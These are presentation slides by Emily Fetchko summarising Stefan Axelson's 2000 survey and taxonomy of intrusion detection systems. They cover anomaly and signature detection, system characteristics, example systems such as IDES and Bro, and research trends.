Intrusion Detection Systems: A Survey
and Taxonomy
A presentation by Emily Fetchko
About the paper
• By Stefan Axelson of Chalmers
University of Technology, Sweden
• From 2000
• Cited by 92 (Google Scholar)
• Featured on InfoSysSec
• Used in Network Security (691N)
• Followup to 1999 IBM paper “Towards a
Taxonomy of Intrusion Detection
Systems”
Outline
•
•
•
•
•
New and Significant
What is a taxonomy?
Introduction to IDS
Introduction to classification
Taxonomy by Intrusion Detection
Principle
• Example systems
• Taxonomy by System Characteristics
• Trends in Research and Conclusion
New and Significant
• First taxonomy paper
• Predicts research areas for Intrusion
Detection
• Followup to 93 page survey report of
research and IBM paper
What is a taxonomy?
• “either a hierarchical classification of
things, or the principles underlying the
classification” (Wikipedia)
• Serves three purposes
– Description
– Prediction
– Explanation
Intrusion Detection Systems
• Compare them to burglar alarms
• Alarm/siren component
– Something that alerts
• Security officer/response team
component
– Something to respond/correct
• Different from perimeter defense
systems (such as a firewall)
Types of intrusions
• Masquerader
– Steals identity of user
• Legitimate users who abuse the system
• Exploits
– Trojan horse, backdoor, etc.
• And more
Two major types of detection
• Anomaly detection
– “abnormal behavior”
– May not be undesirable behavior
– High false positive rate
• Signature detection
– Close to previously-defined bad behavior
– Has to be constantly updated
– Slow to catch new malicious behavior
Approaches to classfication
• Type of intrusion detected
• Type of data gathered
• Rules to detect intrusion
Taxonomy by Intrusion Detection Principles
• “self-learning”
– Trains on “normal”
behavior
• “programmed”
– User must know
difference between
normal & abnormal
• “signature
inspired”
– Combination of
anomaly and
signature methods
Anomaly detection
• Time series vs. non time series
• Rule modeling
– Create rules describing “normal behavior”
– Raise alarm if activity does not match rules
• Descriptive statistics
– Compute distance vector between current
system statistcs and “normal” stats
• ANN – Artificial Neural Network
– Black box modeling approach
Anomaly detection, continued
• Descriptive Statistics
– Collect statistics about parameters such as
#logins, #connections, etc.
– Simple statistics – abstract
– Rule-based
– Threshold
• Default Deny
– Define safe states
– All other states are “deny” states
Signature Detection
• State-modeling
– If the system is in this state (or followed a
series of states) then an intrusion has
occurred
– Petri-net – states form a petri net, a type of
directed bipartite graph (place vs transition
nodes)
Signature Detection, continued
• Expert system
– Reasoning based on rules
– Forward-chaining most popular
• String-matching
– Look for text transmitted
• Simple rule-based
– Less advanced but speeder than expert system
Signature Inspired Detection
• Only one system in the taxonomy
(Signature Inspired and Self Learning)
• Automatic feature selection
– Automatically determines which features
are interesting
– Isolate, use them to decide if intrusion or
not
Classification by Type of Intrusion
• Well-known intrusions
– Correspond to signature detection systems
• Generalized intrusions
– Like a well-known intrusion, but with some
parameters left blank
– Correspond to signature-inspired detectors
• Unknown intrusions
– Correspond to anomaly detectors
Effectiveness of Detection
• Two categories marked as least effective
• Anomaly – Self Learning – Non-time
series
– Weak in collecting statistics on normal
behavior
– Will create many false positives
• Anomaly – Programmed – Descriptive
Statistics
– If attacker knows stats used, can avoid
them
– Leads to false negatives
Taxonomy by System Characteristics
• Define system beyond the detection
principle
• Time of detection
– Real time or non real time
• Granularity of data processing
– Continuous or batch
• Source of audit data
– Network or host
System Characteristics, continued
• Response to detected intrusions
– Active or passive
– Modify attacked or attacking system
• Locus of data processing
– Centralized or distributed
• Locus of data collection
• Security (ability to defend against direct
attack)
• Degree of interoperability
– Work with other systems
– Accept other forms of data
Example Systems
• Haystack, 1988
– Air Force
– Anomaly detection based on per user
profile, and user group profile
– Signature based detection
• MIDAS, 1988
– National Computer Security Centre and
Computer Science Laboratory, SRI
International
– Heuristic intrusion detection
– Expert system with two-tiered rule base
Example Systems, continued
• IDES – Intrusion Detection Expert
System, 1988-1992
– Multiple authors, long term effort
– Real time expert system with statistics
– Compare current profile with known profile
– Distinction between “on” and “off” days
– NIDES = next generation IDES
• NSM – Network Security Monitor
– Monitors broadcast traffic
– Layered approach – connection & lower
layers
– Profile by protocol (telnet, etc)
Example Systems, continued
• DIDS – Distributed IDS, 1992
– Incorporates Haystack and NSM
– Three components: Host monitor, LAN
monitor, DIDS director
– DIDS director contains expert system
• Bro, 1998
– Network-based (with traffic analysis)
– Custom scripting language
– Prewritten policy scripts
– Signature matching
– Action after detection
– Snort compatibility
System Characteristics, continued
System characteristics, continued
Trends in Research
• Active response
– Legal ramifications, however
• Distributed detection
– Corresponds with distributed computing in
general
• Increased security
• Increased interoperability
Opportunities for Further Research
•
•
•
•
Taxonomies by other classifications
Signature – self-learning detectors
Two tiered detectors
False positive rates for anomaly
detectors
• Active response detectors
• Distributed detectors
• High security detectors
Bibliography
• Stefan Axelson. “Intrusion Detection Systems:
A Survey and Taxonomy”. Chalmers University
of Technology, Sweden, 2000.
• Debar, Decier and Wespi. “Towards a
taxonomy of intrusion-detection systems”.
Computer Networks, p805-822, 1999.
• Bro Intrusion Detection System, www.broids.org
• Google Scholar, http://scholar.google.com